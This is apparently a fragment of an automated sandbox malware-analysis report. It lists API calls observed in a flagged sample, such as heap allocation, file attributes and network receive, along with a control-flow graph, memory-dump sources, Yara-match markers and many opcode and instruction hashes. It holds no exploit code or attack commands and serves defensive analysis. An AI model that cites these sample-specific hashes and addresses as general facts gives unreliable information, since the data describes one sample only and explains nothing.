                                                                                                                                              • Opcode Fuzzy Hash: d8874ac4936be8350cfe21478b84fb41e6ecce097792c02c680fe5597fc04902
                                                                                                                                              • Instruction Fuzzy Hash: EBE12771E002049BDB14BB68DD1B39E7BB1AB45724F942A9CE859773C2DB345F8887C2

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 860 e8d82f-e8d83a 861 e8d848-e8d84e 860->861 862 e8d83c-e8d846 860->862 864 e8d850-e8d851 861->864 865 e8d867-e8d878 RtlAllocateHeap 861->865 862->861 863 e8d87c-e8d887 call e875f6 862->863 869 e8d889-e8d88b 863->869 864->865 866 e8d87a 865->866 867 e8d853-e8d85a call e89dc0 865->867 866->869 867->863 873 e8d85c-e8d865 call e88e36 867->873 873->863 873->865
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E8A813,00000001,00000364,00000006,000000FF,?,00E8EE3F,?,00000004,00000000,?,?), ref: 00E8D871
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: cd14d9df2f3cee4c927c0a11edf5c971e47d6606aa2a607741919bc66ae06ad2
                                                                                                                                              • Instruction ID: 744f55acd83760a4e041bac541e0496c2f8863ebc208049c24c3b566bca712a9
                                                                                                                                              • Opcode Fuzzy Hash: cd14d9df2f3cee4c927c0a11edf5c971e47d6606aa2a607741919bc66ae06ad2
                                                                                                                                              • Instruction Fuzzy Hash: 56F0E23260922466EB293B72AD06AAB7799DF85370B18B121EC0CF71D1DA20EC0083E0
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00E5DA1D,?,?,?,?), ref: 00E587B9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 113e74dac3c6c3b8e554b26c7a21ea5fc99b817e641827d450f6e863e0c53694
                                                                                                                                              • Instruction ID: 89ab8927d71376e86b059bbf2f8f6be84b9b7a2b708907613c5cd65a3c44c102
                                                                                                                                              • Opcode Fuzzy Hash: 113e74dac3c6c3b8e554b26c7a21ea5fc99b817e641827d450f6e863e0c53694
                                                                                                                                              • Instruction Fuzzy Hash: D5C08C3802160009FD1C493846958A83346894F7AE7F83FA5ED70FB2E1DE35680F9250
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00E5DA1D,?,?,?,?), ref: 00E587B9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: f204d3b3a26c22159cbc1d32e0481a62727b4963cc995fea60ef2eec9e82453d
                                                                                                                                              • Instruction ID: d2832c26758f431fe7bf63ffcaec21f3bf7025a8249df819cbff96db32d9b04b
                                                                                                                                              • Opcode Fuzzy Hash: f204d3b3a26c22159cbc1d32e0481a62727b4963cc995fea60ef2eec9e82453d
                                                                                                                                              • Instruction Fuzzy Hash: D6C0803401110045F51C493856544243305990B71F3F43F69DD31FB1E1DF32D40BC690
                                                                                                                                              APIs
                                                                                                                                              • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E5B3C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Initialize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                              • Opcode ID: 68f5921dcd88f31092fa02b17d5518f8e32999cb47c4a60ad256186fa5c42228
                                                                                                                                              • Instruction ID: 6177537181df0e4b7693edcda232effa06e860f3477928d3c1c81a26597cde08
                                                                                                                                              • Opcode Fuzzy Hash: 68f5921dcd88f31092fa02b17d5518f8e32999cb47c4a60ad256186fa5c42228
                                                                                                                                              • Instruction Fuzzy Hash: 35B12770A10268DFEB28CF14CD94BDEB7B5EF15304F5085D9E80AA7281D775AA88CF90
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D'{s
                                                                                                                                              • API String ID: 0-234340520
                                                                                                                                              • Opcode ID: e453314a0d9662b4a995be7f9909a7be3a609976784e3f30230c6a56fe06b768
                                                                                                                                              • Instruction ID: 6d39d5a2f349c3c19d49e2033964bfe38bc330160e79e7f616ae7d78d9e390cd
                                                                                                                                              • Opcode Fuzzy Hash: e453314a0d9662b4a995be7f9909a7be3a609976784e3f30230c6a56fe06b768
                                                                                                                                              • Instruction Fuzzy Hash: CF01D6BB04C210BE6552D9817B685BF3B6FE5D7330B30806AFC4797641E1644A556171
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: D'{s
                                                                                                                                              • API String ID: 0-234340520
                                                                                                                                              • Opcode ID: 3adac9a1269a1f4fda62b77e45bb84e2f6e348b8f348b20ac46a7a469ec7458c
                                                                                                                                              • Instruction ID: ebf59803bab20826306e3ed13046ae17018e214b38ce5801b5ce72c0a87da34f
                                                                                                                                              • Opcode Fuzzy Hash: 3adac9a1269a1f4fda62b77e45bb84e2f6e348b8f348b20ac46a7a469ec7458c
                                                                                                                                              • Instruction Fuzzy Hash: 4401F7AB04C220BE6513D5417B3C9BF3B6FE5D7331B30802AFC4793601F1A54A54A132
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a959bf6c336dbd4ea894fc4e3af55e35e20944f8dcb9864f6e7a4f1984348ee1
                                                                                                                                              • Instruction ID: 2aa0087fbddf83870e5e6292f9bd8c40ad2f849a4b41f56b7872b266643200ee
                                                                                                                                              • Opcode Fuzzy Hash: a959bf6c336dbd4ea894fc4e3af55e35e20944f8dcb9864f6e7a4f1984348ee1
                                                                                                                                              • Instruction Fuzzy Hash: 330126AB01C254FDA613DA61773D5FF3F2BE983330B308567FC8395112A1550A59A632
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2d0b50587f9f9c86d94394049594324b48d6b3b9d1985adffd333e066dcf4871
                                                                                                                                              • Instruction ID: 633070d1fef34b1952e07e86da6a90b212679188ab11b5dea6fca3cdf2a61638
                                                                                                                                              • Opcode Fuzzy Hash: 2d0b50587f9f9c86d94394049594324b48d6b3b9d1985adffd333e066dcf4871
                                                                                                                                              • Instruction Fuzzy Hash: 07F0BEAB05C210FE9653A981773D6FF7B6BBB93330B309012FC4724501B1A54754A222
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3cb0ef477f3ba1dc3cf76a2d01b74a3dd3bca42d30d55548eca862b72fc48dba
                                                                                                                                              • Instruction ID: 8f1121e2774ac7413f18bb8a4f9f2b50936b075565ba2547d4b44bf7984da76a
                                                                                                                                              • Opcode Fuzzy Hash: 3cb0ef477f3ba1dc3cf76a2d01b74a3dd3bca42d30d55548eca862b72fc48dba
                                                                                                                                              • Instruction Fuzzy Hash: 38F020EB06C200FE9113A992737C6BF3BABB693330B309022BC4360A01B0940784A232
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1722125500.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 01583a5cd164d3d5c37f7c8ce59a198b8029344bd77d4091fa93bb59e34ed9df
                                                                                                                                              • Instruction ID: 81f91ae494cc697fcf3d6c7822457da8dca78d74d1f1689ee34293ac7b6f8590
                                                                                                                                              • Opcode Fuzzy Hash: 01583a5cd164d3d5c37f7c8ce59a198b8029344bd77d4091fa93bb59e34ed9df
                                                                                                                                              • Instruction Fuzzy Hash: 46F05C7704C2119FC213E16125AD17F7F57BA03330378426EB44357A83D1064368A232
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                              • Opcode ID: 131f91755854517cd6437e25475a90cb277ba81877931b2a99b088e85ca796fb
                                                                                                                                              • Instruction ID: f5893bbd0deb65e6613e01012e16ac692bffd1be1ecfb3bf05ef86c3fa63dfdc
                                                                                                                                              • Opcode Fuzzy Hash: 131f91755854517cd6437e25475a90cb277ba81877931b2a99b088e85ca796fb
                                                                                                                                              • Instruction Fuzzy Hash: 58C217B1E046288BDF25CE28DD40BEAB7B5EB48305F1551EAD84DF7281E775AE818F40
                                                                                                                                              APIs
                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 00E5E10B
                                                                                                                                              • recv.WS2_32(?,?,00000008,00000000), ref: 00E5E140
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: recv
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                              • Opcode ID: e96d1a25dbd491e7a2bf0f65e7a7227293bf74dc3e63a23886cd7762fc80ff6d
                                                                                                                                              • Instruction ID: 8d5bacfa2322c19134c5d3e6080a1dd255bd74f4d0b7228052d558f15a0919e2
                                                                                                                                              • Opcode Fuzzy Hash: e96d1a25dbd491e7a2bf0f65e7a7227293bf74dc3e63a23886cd7762fc80ff6d
                                                                                                                                              • Instruction Fuzzy Hash: 5A31E771A006489FD724CB69DC81BEB77BCEB08728F101626E910F73D1C674A948CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                              • Instruction ID: db0632f36761d3a665f1bb54d6a33c39332ee7f1ef69e6313ebc12c480304dd2
                                                                                                                                              • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                                                                                                                                              • Instruction Fuzzy Hash: 23F11C71E012199BDF14CFA9C8806AEBBB1FF88314F25826DD919BB345D731AE41CB90
                                                                                                                                              APIs
                                                                                                                                              • GetSystemTimePreciseAsFileTime.KERNEL32(?,00E6CF52,?,00000003,00000003,?,00E6CF87,?,?,?,00000003,00000003,?,00E6C4FD,00E52FB9,00000001), ref: 00E6CC03
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Time$FilePreciseSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1802150274-0
                                                                                                                                              • Opcode ID: c74e279dcb9a313f73a532c90bfe43638809175933b4ba406340be4cd1e03052
                                                                                                                                              • Instruction ID: 131c1f2512cc7a3a2dbe6d007bc51e0b1139cb1c7b9151539331d0c21951b806
                                                                                                                                              • Opcode Fuzzy Hash: c74e279dcb9a313f73a532c90bfe43638809175933b4ba406340be4cd1e03052
                                                                                                                                              • Instruction Fuzzy Hash: 2AD02232B822389FCA412B85FC009BDFB88CF05B983081112EE0833130CE127C009BE4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                              • Instruction ID: 95c58351d061204a852d68f33203769b563151cb649c3fcbded8693e4cc979a1
                                                                                                                                              • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                              • Instruction Fuzzy Hash: 66519E303086085AEB38B6298A957BE67D65F1130CFA43519EDCEF7292CE62DD49C351
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 97e989664887757e6519e9c4683b2da9bfea7f91347828679f25b0d9772bd5f9
                                                                                                                                              • Instruction ID: 18df8ddc3d5c80ff1d903450b6edfda64ec7dc4a484fc0fd60d1c776bb8c773c
                                                                                                                                              • Opcode Fuzzy Hash: 97e989664887757e6519e9c4683b2da9bfea7f91347828679f25b0d9772bd5f9
                                                                                                                                              • Instruction Fuzzy Hash: 3F2270B3F515144BDB0CCB9DDCA27EDB2E3AFD8218B0E813DA40AE3345EA79D9158644
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c6787c87ebd7024113eb5471142d48d4e2a02c65c730301008df260b5095b9f0
                                                                                                                                              • Instruction ID: 4914fb26fac0f52a775d1ecda3cb5a3d4840880b3cb2813f7d7d0ee0d70fa3f3
                                                                                                                                              • Opcode Fuzzy Hash: c6787c87ebd7024113eb5471142d48d4e2a02c65c730301008df260b5095b9f0
                                                                                                                                              • Instruction Fuzzy Hash: 3EB16D71624604DFDB18CF28C486BA57BE0FF45368F299658E8D9DF2A1C335E986CB40
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ab3a7245f2ae2a68578d3b6cd87bc51ed288aeba09ea7f2f30f1ed8dbc1382d0
                                                                                                                                              • Instruction ID: b54bcb3618efe36e87125571507d3c835c513acc12d2fb95184c4af511d1616f
                                                                                                                                              • Opcode Fuzzy Hash: ab3a7245f2ae2a68578d3b6cd87bc51ed288aeba09ea7f2f30f1ed8dbc1382d0
                                                                                                                                              • Instruction Fuzzy Hash: C681DFB0A002458FEB15CF69D8907EEFBF1BB59309F141A69DD50B7392C3359989CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a64dd9a0b89a4a453bdea20086c9bc834292716250a9d803b510e1d8ef09de03
                                                                                                                                              • Instruction ID: 4c533f4bdaa3edc4d26007dbc1f72568420a6a515fb452ac9de624bf5344ae76
                                                                                                                                              • Opcode Fuzzy Hash: a64dd9a0b89a4a453bdea20086c9bc834292716250a9d803b510e1d8ef09de03
                                                                                                                                              • Instruction Fuzzy Hash: 4021B673F204394B7B0CC57E8C5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cfe016952d683eee3724fcaa8e4ec1b68436038e24dad3d90faacdef5695bfb6
                                                                                                                                              • Instruction ID: fe3fd30b23f3574ad95127f6fee89851c2b8f32b6c5d13e2634e43984ba90151
                                                                                                                                              • Opcode Fuzzy Hash: cfe016952d683eee3724fcaa8e4ec1b68436038e24dad3d90faacdef5695bfb6
                                                                                                                                              • Instruction Fuzzy Hash: 3E118663F30C255B675C81AD8C172BAA5D2EBD825071F533AD826F7284E9A4DE23D290
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                              • Instruction ID: ab77dd8c36a43a92815d45fe7b141ecadbd6c1a7d79cce2944ba3209c157332a
                                                                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                              • Instruction Fuzzy Hash: 14112EB720014143EE3C8A2DCAB45B7A795EBC73297EC6375D0427B774DA22D9459620
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                              • Instruction ID: 2b6009a7b9ab85a923cba61acc3fe19cdc0fedf1fd855d5d954a5b41d092f2af
                                                                                                                                              • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                                                                                              • Instruction Fuzzy Hash: 51E08C32921228EBCB14EB98C90498EF7ECEB49B01B6910A6F509E3150C270DE00C7D0
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strrchr
                                                                                                                                              • String ID: v
                                                                                                                                              • API String ID: 3213747228-1361604894
                                                                                                                                              • Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                              • Instruction ID: 17a20a791ac5e0676fcb06b0be814946eea160b92120552947a7faf798d15031
                                                                                                                                              • Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
                                                                                                                                              • Instruction Fuzzy Hash: 71B102329046459FDB15AF28C881BBEBBE5EF46344F24916AE85DFB282D6349D01CB70
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1719318091.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719460485.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719476233.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719501305.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719754002.0000000001058000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719863677.000000000106E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1719918303.000000000106F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720025951.0000000001077000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720052328.0000000001080000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720079903.00000000010A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720099065.00000000010AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720115148.00000000010AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720130839.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720150882.00000000010B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720166422.00000000010BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720188381.00000000010C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720203701.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720219976.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720235908.00000000010CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720250464.00000000010D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720265532.00000000010D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720281104.00000000010D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720297553.00000000010D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720311947.00000000010D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.00000000010DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720328311.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720382455.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720400324.0000000001145000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720419501.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720435918.000000000114B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720452280.000000000114D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720470523.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720487720.000000000115C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720504494.000000000115D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1720521553.000000000115E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_e50000_file.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Mtx_unlock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1418687624-0
                                                                                                                                              • Opcode ID: 443f4a95ecbf2c34e27c76247bbcf7db3156c3f76efbab9c7dd9b2d002b8eed7
                                                                                                                                              • Instruction ID: 1697fa33769e59388d8de37df02f07ee71bd29b4dbf2cf6c724ac0ce28e0b418
                                                                                                                                              • Opcode Fuzzy Hash: 443f4a95ecbf2c34e27c76247bbcf7db3156c3f76efbab9c7dd9b2d002b8eed7
